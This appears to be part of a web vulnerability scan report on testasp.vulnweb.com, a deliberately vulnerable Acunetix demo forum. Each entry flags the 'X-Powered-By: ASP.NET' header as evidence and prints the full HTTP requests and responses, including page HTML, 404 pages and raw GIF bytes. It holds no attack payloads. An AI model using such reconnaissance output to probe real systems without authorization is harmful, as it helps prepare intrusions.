<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 214 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=EKIMIJFAFCFMONCJOBLJPEKD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:37 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/* |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/* HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 1245 |
Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 346 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 950 |
Response Body - size: 950 bytes. |
GIF89ad d æ ÿÿÿá
üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï !ù , d d ÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀ×ØÙÚÛÜÙÄ å 9Q9à×óñóàÆ Dé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fì ÿ(Tè°`¸]R.Ø8CJ[ @ 9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌD jñB&¿C æå3p D §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH (¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå« ; |
URL | http://testasp.vulnweb.com/Default.asp |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/favicon.ico |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/favicon.ico HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,*/* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/ Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN |
Request Body - size: 0 bytes. |
|
Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:32 GMT Content-Length: 1245 |
Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Images/logo.gif |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 321 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 4933 |
Response Body - size: 4,933 bytes. |
GIF89a2& |